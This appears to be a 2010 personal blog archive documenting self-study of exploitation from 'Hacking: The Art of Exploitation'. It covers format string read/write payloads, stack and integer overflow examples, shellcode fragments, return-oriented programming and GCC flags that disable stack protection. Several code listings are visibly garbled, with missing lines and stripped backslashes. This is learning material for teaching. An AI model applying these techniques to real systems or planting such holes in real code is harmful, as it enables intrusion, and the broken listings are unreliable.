Archive for September, 2010

ASLR, Dynamic Linkers, & Mmap

Well I had hoped to learn more about Address Space Layout Randomization (ASLR) and blog about it after reading “On the Effectiveness of Address-Space Layout Randomization.” I got about a quarter of the way through the paper and realized that I need to better understand address space layout in general. Where is libc in memory and how do programs get access to it?

I’ve been Googling and reading for the last 3.5 hours and am somewhat more informed but I’m still trying to figure it all out.

Every ELF executable on Linux invokes the dynamic linker which is the bootstrap for finding and loading all other shared libraries (.so extensions). I think that the linker uses mmap() to memory map the shared libraries from the disk into virtual address space but I’m still somewhat confused on this part.

Mmap was another thing I wasn’t familiar with. Memory mapped files essentially allow a program to refer to a file as if it were in memory by paging in page sized chunks into memory. For writing files, it has the advantage that many small writes will happen to memory and then the virtual memory manager will write the page all at once to disk. I’m still trying to figure out what the advantage of mmap’ing shared libraries is. For shared libraries, mmap is used to map the shared library into the processes address space as if the process contained library in it’s memory. According to what I read, mmap can be used to map “shared memory objects” as well as files, etc. Basically anything that has a file descriptor can be memory mapped.

I’m wondering if the operating system loads very common and essential libraries like glibc into physical memory and then mmap’s them to the processes virtual address space or if it memory maps the actual file on disk like I mentioned above (i.e. /usr/lib/

So far the best material I’ve found related to these subjects was

and one that looks good but I haven’t had a chance to read yet this one is especially good:

Format String Vulnerabilities:Part 2

In part one of Format String Vulnerabilities I showed you some simple code with a very serious format string vulnerability. I showed you how you could exploit this vulnerability to read any part of memory. In section two, I’m going to show you how you can write to any address in memory!

Writing to Memory

Exploiting format string vulnerabilities is all about providing input that uses a format character that expects its value to be passed by reference and you control that reference. I used ‘%s’ to read from memory. I’m going to use %n to write to memory.

%n	      Number of characters written by this printf.

Lucky for us, there is a really easy way to control the number of characters written by printf. When you specify a format character, you can optionally give it an integer for the width of the format character.

%#x	      Number of characters prepended as padding.

We can use this to control how many characters are written by printf.

If you’re following at this point, you’re probably wondering how we’re going to use %n to write to memory. We can use %n to write the integer value of our 4 byte target address one byte at a time.

We can write the lower order bits and shift the target address by a byte, utilizing width padding characters to control the integer value we write to a given byte.

Target = 0xAAAA1111
0xAAAA1111 = <int>
0xAAAA1112 = <int>
0xAAAA1113 = <int>
0xAAAA1114 = <int>

If we can overwrite an address, we can control the flow of execution. Let’s overwrite the address of printf! First we need to find the address for printf

nobody@nobody:~$ objdump -R ./text_to_print
08049660 R_386_JUMP_SLOT   printf

Next we need to craft a string to overwrite this address using %n and width padding. We’ll also use printf’s ability to argument swap:

One can also specify explicitly which argument is taken
by writing '%m$' instead of '%'

Lastly, instead of writing a byte at a time, we can use printf’s ‘length modifier’ to tell printf what type it’s writing %n too. We’ll use ‘l’ (ell) for long unsigned int.

0x0000beef seems like a good address to overwrite printf with since everyone loves beef! Our input will be a 4 byte address (to printf) and the decimal value of beef – 4 (to accommodate the length of the address) = 48875.

Here’s what It looks like when we run it (note we have to escape the $ with a for the shell):

nobody@nobody:~$ ./text_to_print $(python -c 'print "x60x96x04x08"')%48875x%4$ln

Program received signal SIGSEGV, Segmentation fault.
0x0000beef in ?? ()

You can see that the program tried to jump to 0x0000beef and crashed! Be sure to check out the full section on format string vulnerabilities inHacking: The Art of Exploitation, it talks all about these techniques and more.

Disable VirtualBox Menu Bar OSX

I frequently use Linux in VirtualBox as a testing and hacking environment. It got really annoying when I would go to the Gnome menu bar and the OSX Menu bar would pop up overtop of the Gnome menu bar!

Luckily, the guys (or gals) over at Eternal Storms Software have an awesome app called PresentYourApps. Once you’ve installed it, set VirtualBox VM to “Remove Menu Bar and Dock”

Then, restart VirtualBox — no more Menu Bar!

Format String Vulnerabilities:Part 1

I have to admit that I’ve heard of format string vulnerabilities but I never knew exactly what they were. After reading about them in Hacking: The Art of Exploitation I’m surprised I didn’t know more about them since they are extremely dangerous! Take this code for instance:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];

   if(argc < 2) {
      printf("Usage: <text to print>n", argv[0]);
   strncpy(text, argv[1], 1024);


   return EXIT_SUCCESS;

Normal usage would look like this:

nobody@nobody:~$ ./text_to_print "Hello World!"
Hello World!

Looks harmless right? It’s not! This code is very vulnerable to a format string vulnerability. The problem is, the call to printf, should have been:

 printf("%s", text);

Why does it matter? Well the way that printf works is that all of the variable arguments for the format strings are passed in reverse order onto the stack. Printf then parses the input until it reaches a format character and references the argument on the stack based on the index of the format character.

If we specially craft the input to take format characters, printf will mistakenly reference previous elements on stack. We can use this to effectively read the stack. For instance

nobody@nobody:~$ ./text_to_print "AAAA %x %x %x %x"
AAAA bffff9ba 3f0 0 41414141

It gets better though! The previous stack frame before printf is called contains the string argument passed to printf. Did you notice in the output above, the last ‘%x’ printed the first ‘AAAA’?

We can use this to read the contents of any memory address by putting the address we want to read at the first of the string, followed by 3 stack positions (8 bytes each), and then putting a ‘%s’ format character at the 4th position to read our address. Like this (the ‘+’ is used to separate for readability)

nobody@nobody:~$ ./text_to_print $(printf "x34xf8xffxbf")%08x%08x%08x%s

or with Python like this

nobody@nobody:~$ ./text_to_print $(printf "x34xf8xffxbf")$(python -c 'print "%08x+"*3')%s

00000000 is the contents of address xbffff834!

More to come on using format string vulnerabilities to write to any place in memory in Part Two of Format String Vulnerabilities!

Flow of a Buffer Overflow Payload

Here is the flow of a buffer overflow payload with a NOP Sled.

  1. Jump to overwritten return address that (hopefully) points to somewhere in the NOPs (0×90)
  2. Consume the No Operations (NOPs)
  3. Execute the shell code


Trouble Spawning a Shell

I’ve been working on some of the examples out of the Hacking: The Art of Exploitation book which exploit a program with shellcode but I’m not having much luck. The exploit makes sense conceptually but I can’t get it to spawn the shellcode.

It uses the system() function to invoke the exploitable program from the shell with the payload as a commandline arg. I want to look at the stack in GDB of the command being invoked by the system() function … does anyone know how to do this or know if it’s even possible?

It’s possible for me to look at the stack when I pass the arguments myself from the commandline but the system() function is doing it instead cause it’s easier to construct the shellcode programmatically.

I also looked at the return value of the system() function and it’s zero meaning that the program exited normally. I’m curious if the somehow the command payload isn’t getting passed correctly so I was hoping to look at the stack…

My problems were related to trying to execute the exploit on a 64-bit system when the code was developed for 32-bit. After switching over to a 32-bit OS, I was able to spawn a shell no problem!

32 bit vs 64 bit exploitation

The exploit code in Hacking: The Art of Exploitation is targeted towards overwriting 32 bit return addresses (size 4). It uses code like this:

unsigned int ret;
ret = &var;
*((unsigned int *)(buffer+sizeof(unsigned int))) = ret;

I’m working on a 64 bit machine and thus my addresses are double in size. I’m guessing this means that the above code won’t work on my machine (I’m not sure?). I searched around and found an “unsigned integer pointer type” which is defined per architecture and it is indeed size 8 on my 64 bit machine. I changed the code to this:

uintptr_t ret;
ret = &var;
*((uintptr_t *)(buffer+sizeof(uintptr_t)) = ret;

I thought that this was the reason I was having trouble spawning a shell from shellcode but after changing the code it still doesn’t spawn a shell.

Not only do I think the return addresses are going to be different between 64 bit and 32 bit but they’ve totally changed the syscall numbers in “unistd.h”. That means that this shellcode isn’t going to work at all on 64-bit because it assumes ‘execve’ is 11.

; execve(const char *filename, char *const argv [], char *const envp[])
  push BYTE 11      ; push 11 to the stack
  pop eax           ; pop dword of 11 into eax
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

On 64 bit, 11 is ‘munmap’

#define __NR_munmap                             11

Looks like I’ll definitely be installing a 32 bit version of Linux in order to follow along with the examples, 64 bit is going to be too challenging while I’m in the learning stage.

Quickly Use BC to Convert Hex to Dec

This post is mainly for my own benefit because I’ll forget this if I don’t put it down somewhere. A lot of the times I need to convert hex to dec when I’m on the command line and it’s a pain to open up the calculator so here is the command line equivalent

echo "ibase=16; FFFF" | bc

Turning off buffer overflow protections in GCC

As I’m learning more and more about exploiting buffer overflows I’m realizing that it’s actually pretty hard to run the examples that teach you how to exploit buffer overflows. GCC (and other compilers) have built in support for mitigating the simple buffer overflows and it’s turned on by default.

With GCC you have to compile with the -fno-stack-protector option otherwise you get “***stack smashing detected***,” this is pretty well known and documented all over the net.

However, additionally you’ll need to disable the FORTIFY_SOURCE option otherwise you’ll get “Abort trap” if you try to do a buffer overflow that uses something like strcpy or memcpy.

To disable it, simply compile with the flag -D_FORTIFY_SOURCE=0 (e.g. gcc -g -fno-stack-protector -D_FORTIFY_SOURCE=0 -o overflow_example overflow_example.c)

FORTIFY_SOURCE is enabled by default on a lot of Unix like OSes today. It’s original development dates back almost 6 years ago but I don’t think it was turned on by default until recently (within the past 2 years)

#  else
#    define _FORTIFY_SOURCE 2	/* on by default */
#  endif

That means that when you include something like “string.h”, at the bottom of “string.h” is the following (at least on Mac OS X 10.6):

#if defined (__GNUC__) && _FORTIFY_SOURCE > 0 && !defined (__cplusplus)
/* Security checking functions.  */
#include <secure/_string.h>

So when you compile, instead of seeing a call to strcpy

0x0000000100000d50 <main+188>:  lea    rdi,[rbp-0x20]
0x0000000100000d54 <main+192>:  call   0x100000dba <dyld_stub_strcpy>
0x0000000100000d59 <main+197>:  lea    rdx,[rbp-0x20]

you’ll see a call to the strcpy_chk function in your disassembled code

0x0000000100000d50 <main+192>:  mov    edx,0x8
0x0000000100000d55 <main+197>:  call   0x100000daa <dyld_stub___strcpy_chk>
0x0000000100000d5a <main+202>:  lea    rdx,[rbp-0x20]

This will wreck havoc on any of your simple buffer overflow exploiting examples so make sure you disable it when you compile. Happy exploiting!

Adobe PDF Return Oriented Exploit

The news just keeps getting worse for Adobe. After releasing an out-of-band patch for their other 0-day PDF exploit used to jailbreak the iPhone, the people at McAfee discovered malware in the wild exploiting another 0-day PDF exploit. Apparently this exploit takes advantage of your typical buffer overflow exploit (come on Adobe!) but the way it’s exploited is very interesting; it uses return oriented programming.

Return Oriented Exploitation

This is a very clever exploitation technique that subverts all known countermeasures to mitigate exploitation of overflows such as ASLR, compiler stack protection, and non-executable memory regions. It essentially works by using the prior code on the stack as well as well known (not everything is randomized) locations of library routines as building blocks for executing code. The key is that every “building block” must end in a RET instruction, hence the name return oriented.

Suppose after scanning memory we found the following useful “building blocks” (Commented for understanding )

Block 1
   mov	ebx,0x01 # fd = sysout
Block 2
	mov	ecx,msg # Some msg (e.g. Hello World)
	mov	edx,len # len of msg
Block 3
	mov	eax,0x04 #write syscall
	int	0x80

You could construct each of these “building blocks” in reverse order such that the RET address jumped from one block to the next, in essence executing the following code:

	mov	ebx,0x01 # fd = sysout
	mov	ecx,msg # Some msg (e.g. Hello World)
	mov	edx,len # len of msg
	mov	eax,0x04 #write syscall
	int	0x80

You’re exploit would print “Hello World” to standard out at this point (not much of an exploit!).

These types of exploitation techniques seem very hard to defend against. I’d be interested to see what mitigation techniques they’ll come up for to defend this! For more info on Return Oriented Exploitation, check out an excellent presentation at

Finding the Return Address on the Stack

Chapter 3 of Hacking: The Art of Exploitation is all about exploitation. As mentioned in my post on stack-based buffer overflows, one of the key points to exploiting these types of overflows is gaining control of the return address from a function call.

I’ll be using the source code from my stack-based buffer overflows post. First, lets look at what main() looks like disassembled.

(gdb) disassemble main
Dump of assembler code for function main:
0x0000000100000ecd <main+0>:    push   rbp
0x0000000100000ece <main+1>:    mov    rbp,rsp
0x0000000100000ed1 <main+4>:    sub    rsp,0x10
0x0000000100000ed5 <main+8>:    mov    DWORD PTR [rbp-0x4],edi
0x0000000100000ed8 <main+11>:   mov    QWORD PTR [rbp-0x10],rsi
0x0000000100000edc <main+15>:   mov    rax,QWORD PTR [rbp-0x10]
0x0000000100000ee0 <main+19>:   mov    rdi,QWORD PTR [rax]
0x0000000100000ee3 <main+22>:   call   0x100000e88 <function>
0x0000000100000ee8 <main+27>:   mov    eax,0x0
0x0000000100000eed <main+32>:   leave
0x0000000100000eee <main+33>:   ret
End of assembler dump.

I’ve highlighted the call to the function and one instruction after it. The return address is always the next instruction address after the function call. The ‘call’ instruction pushes the return address onto the stack.

Let’s set a break point in function() so we can examine the stack after the ‘call’ instruction

(gdb) break 13
Breakpoint 1 at 0x100000ea4: file ../src/main.c, line 13.
(gdb) run hello
Breakpoint 1, function (in=0x7fff5fbff2e8 "/TheXploit/Debug/TheXploit") at ../src/main.c:14
(gdb) x/16xw $rsp
0x7fff5fbff0c0: 0x5fbff288      0x00007fff      0x5fbff2e8      0x00007fff
0x7fff5fbff0d0: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fff5fbff0e0: 0x00000000      0x00000000      0x282afe15      0xa5aa35fb
0x7fff5fbff0f0: 0x5fbff110      0x00007fff      0x00000ee8      0x00000001

Here we’ve examined 16 words from the top of the stack frame for function(). You may not notice it at first but the return address is the last 8 bytes (0x7fff5fbff0f9 – 0x7fff5fbff0ff) in the output above. It’s in Little Endian byte order so it appears backwards; the lower order bytes appear first. Look back at the disassembled main() function at the address after the call to function(), it’ll be 0x0000000100000ee8, exactly what’s on the stack (remember to swap them for lower order bytes first)!

More to come about overwriting this address to gain control of the program!

Void Function Pointers in C

Hacking: The Art of Exploitation has a really nice crash course on C. The book has a paragraph or two about function pointers.

Every time I look at function pointers, I find myself referring back to some documentation or getting confused (one too many *’s! or the parenthesis are wrong)

Here is a very simple example to demonstrate void function pointers, hopefully so I can remember in the future!.

#include <stdio.h>

void hello() {

void world() {

void space() {
	printf(" ");

void newline() {

void print(const void *f) {
	void (*f_ptr)() = f;

int main(int argc, char **argv) {
	return 0;

x86 64 Bit Stack Boundaries

While inspecting disassembled code on my Macbook Pro, I couldn’t figure out why the stack allocated so much space when I only requested a little. After some investigation into GCC I figured it out.

According to Apple’s developer documentation on GCC, “If -mpreferred-stack-boundary is not specified, the default is 4 (16 bytes or 128 bits).” That means that the stack will always allocate chunks in factors of 16 (2^4) unless you specify otherwise.

That means that the following code

int main(int argc, char **argv) {
        char buf[1];
        return 0;

Translates to allocating 16 bytes on the stack even though it’s only 1 byte.

0x0000000100000ef2 :    sub    rsp,0x10 # 16 bytes

This is not specific to Mac, all 64 bit platforms use this stack alignment. Here is the Windows documentation and here is the Linux documentation. Thanks Pascal!

Types of Overflows: Stack-Based Overflows

A buffer is simply some fixed space in memory used to store data. In C, you create a buffer by declaring an array of some primitive type such as a ‘char array[SIZE]‘ or int ‘array[SIZE]‘. When these arrays are declared, the space for their data is allocated on the stack. The key point is that the space is fixed.

A stack based buffer overflow occurs when more data than what was allocated is put into the buffer and the excess data “overflows” into other stack memory space.

Stack-based buffer overflows are exploitable because of the way the stack allocates stack frames when functions are called. Every time a function is called the return address to jump back to the previously executing function is stored on the stack.

The data that overflows in the current stack frame can overwrite data in the previous stack frame, manipulating the return address. Here’s an example of an exploitable buffer overflow.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void function(char *in) {
	char buf[16];
	strcpy(buf, in);

int main(int argc, char **argv) {
	return 0;

Types of Overflows: Integer Overflows

Integer overflows occur when either a signed positive integer turns negative, a signed negative integer turns positive, or a large unsigned number “wraps around” to (or starts over at) zero. This can happen when you add, subtract, or multiply integers.

Some languages raise an exception when integer overflow occurs. C does not raise an exception; handling of integer overflows is left up to the programmer.

Integer overflows by themselves are mostly useless since they are likely to cause unexpected behavior or program failure but given the right circumstances, they can be used for buffer overflows (heap or stack based depending on the situation).

Here’s an example of an exploitable integer overflow. By inputting the correct integer, we can trick malloc into allocating zero bytes. Memcpy would then start copying over other elements in heap memory. Assuming sizeof(char) is 1, we just need to make size wrap around to zero. 4294967295 is the max unsigned integer; adding 1 to it will cause it to wrap around to 0!

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>

void function(unsigned int size, char* input) {
	char *buf;
	buf = (char *) malloc(size * sizeof(char));
	memcpy(buf, input, size);

int main(int argc, char **argv) {
	unsigned int size = atoi(argv[1]);
	function(size, argv[2]);
	return 0;
Go to Top